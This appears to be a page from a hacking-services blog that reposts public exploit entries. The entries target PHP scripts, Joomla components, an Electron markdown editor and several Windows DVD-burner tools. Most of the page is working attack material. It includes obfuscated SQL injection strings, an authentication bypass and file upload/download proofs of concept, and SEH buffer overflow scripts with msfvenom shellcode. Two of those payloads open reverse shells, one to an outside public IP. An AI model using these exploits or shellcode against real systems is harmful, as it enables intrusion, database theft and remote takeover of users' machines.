Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863178279

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
# Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
#
# .............
# <?php
# $file = base64_decode($_GET['id']);
# 
# if (file_exists($file)) {
#     header('Content-Description: File Transfer');
#     header('Content-Type: application/octet-stream');
#     header('Content-Disposition: attachment; filename="'.basename($file).'"');
#     header('Expires: 0');
#     header('Cache-Control: must-revalidate');
#     header('Pragma: public');
#     header('Content-Length: ' . filesize($file));
#     readfile($file);
#     exit;
# }
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
# 
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
# Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
# http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://codesgit.com/
# Software Link: https://www.codester.com/items/997/smart-chat-php-script
# Demo: http://demos.codesgit.com/smartchat/
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin.php
# User: 'or 1=1 or ''=' Pass: anything
# 
# http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
#
# '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
#
# Etc...
# # # # #
HireHackking 
#!/usr/bin/python

#========================================================================================================================
# Exploit Author     :  Touhid M.Shaikh
# Exploit Title      : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User
Name' Field Buffer Overflow (SEH)
# Date :  28-08-2017
# Website : www.touhidshaikh.com
# Contact : https://github.com/touhidshaikh
# Vulnerable Software:  Easy RM RMVB to DVD Burner
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.8.11
# Software Link:        http://www.divxtodvd.net/easy_rm_to_dvd.exe
# Tested On:            Windows 7 x86
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


buffer = "\x41" * 1008

nSEH = "\xeb\x10\x90\x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"

badchars = "\x00\x0a\x0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"

nops = "\x90" * 16

data = buffer + nSEH + SEH + nops + buf

f = open ("calc.txt", "w")
f.write(data)
f.close()

#Greetz => Jack Carlo
HireHackking 
#!/usr/bin/python

#========================================================================================================================
# Exploit Author:       Touhid M.Shaikh
# Exploit Title:        Easy WMV/ASF/ASX to DVD Burner 2.3.11 - 'Enter User
Name' Field Buffer Overflow (SEH)
# Date:                 28-08-2017
# Website:       www.touhidshaikh.com
# Vulnerable Software:  Easy WMV/ASF/ASX to DVD Burner
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              2.3.11
# Software Link:        http://www.divxtodvd.net/easy_wmv_to_dvd.exe
# Tested On:            Windows 7 x86
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


buffer = "\x41" * 1008

nSEH = "\xeb\x10\x90\x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"

badchars = "\x00\x0a\x0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"

nops = "\x90" * 16

data = buffer + nSEH + SEH + nops + buf

f = open ("calc.txt", "w")
f.write(data)
f.close()

#Greetz => Jack Carlo
HireHackking 
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]

Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2023-05-03

Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D

A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following pay=
load:
<video><source onerror=3D"alert(require('child_process').execSync('/System/=
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Codigo will auto execute the Calculator application.
HireHackking 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 27.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Version: 2.7
# Category: Webapps
# Tested on: windows 7 / mozila firefox 
# supporting tools for testing : No-Redirect Add-on in firefox
#
--!>

# ========================================================
#
#
# admin panel Authentication bypass 
# 
# Description : An Attackers are able to completely compromise the web application built upon
# Matrimonial Script as they can gain access to the admin panel and  manage the website as an admin without
# prior authentication!
# 
# Proof of Concept : - 
# Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
# Step 2: Access http://example.com/path/admin/index.php
# 
# 
# Risk : Unauthenticated attackers are able to gain full access to the administrator panel
# and thus have total control over the web application, including content change,add admin user .. etc
#
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title:        Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date:                 26-08-2017
# Exploit Author:       tr0ubl3m4k3r
# Vulnerable Software:  Easy DVD Creator
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              2.5.11
# Software Link:        http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On:            Windows 10 64bit
#
# Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
#	1. Click Register
#	2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################


buffer = "\x41" * 988
nSEH = "\xeb\x09\x90\x90"

# 0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll)

SEH = "\x59\x78\x03\x10"
junk = "\x90"*16

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
# -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
"\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
"\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
"\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
"\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
"\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
"\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
"\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
"\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
"\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
"\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
"\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
"\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
"\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
"\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
"\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
"\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
"\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
"\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
"\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
"\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
"\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
"\x09\x93\x41\xf3\x2a\xb6")
padding = "\x44"*(1000-351)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
f.close()
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://extro.media/
# Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
# Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en
# Version: 1.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
#
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: http://keenitsolution.com/
# Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866
# Demo: http://photo.keenitsolution.com/
# Version: 1.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL]
#
# 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
HireHackking 
# #
# Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor: http://kamleshyadav.com/
# Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368
# Demo: http://kamleshyadav.com/scripts/autocar_preview/
# Version: 1.1
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# #	
# POC:
# 
# http://localhost/[PATH]/search-cars?category=[SQL]
# ts_user
#  user_uname
#  user_fname
#  user_lname
#  user_email
#  user_pwd
# #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://joomlashack.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/
# Demo: https://demoextensions.joomlashack.com/osdownloads
# Version: 1.7.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL]
#
# 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
HireHackking 
#!/usr/bin/env python
# Exploit Title: Disk Pulse Enterprise 9.9.16 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.diskpulse.com
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Version: v9.9.16
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()
HireHackking 
# # # # #
# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....
#
# Vulnerable Source:
# .....................
# $eid = $_GET["id"];
# ......
# $folder = "img/users/";
# $extention = strrchr($_FILES['bgimg']['name'], ".");
# $bgimg = $_FILES['bgimg']['name'];
# //$bgimg = $new_name.'.jpg';
# $uploaddir = $folder . $bgimg;
# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);
# .....................
# 	
# Proof of Concept:
# 
# Customer profile picture arbitrary file can be uploaded ..
# 
# http://localhost/[PATH]/customerupdate.php?id=1
# http://localhost/[PATH]/img/users/[FILE].php
# 
#####
HireHackking 
#!/usr/bin/python
# Exploit Title     : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC
# Discovery by      : Anurag Srivastava
# Email             : anurag.srivastava@pyramidcyber.com
# Discovery Date    : 18/08/2017
# Software Link     : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx#
# Tested Version    : 1.05
# Vulnerability Type: SEH Overwrite POC
# Tested on OS      : Windows 7 Ultimate x64bit 
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
 
#SEH chain of main thread
#Address    SE handler
#42424242   *** CORRUPT ENTRY ***

 
# Offset to the SEH is 772
buffer = "A"*772
# Address to the Handler Code
seh = "B"*4
#Junk 
junk = "C"*12
# Address to the EIP
eip = "D"*4
f = open("evil.txt", "wb")
f.write(buffer+seh+junk+eip)
f.close()
HireHackking 
# # # # #
# Exploit Title: Matrimony Script 2.7 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://www.matrimony-script.com/
# Software Link: http://www.matrimony-script.com/php-matrimony-software.html
# Demo: http://www.matrimonysearch.com/
# Version: 2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
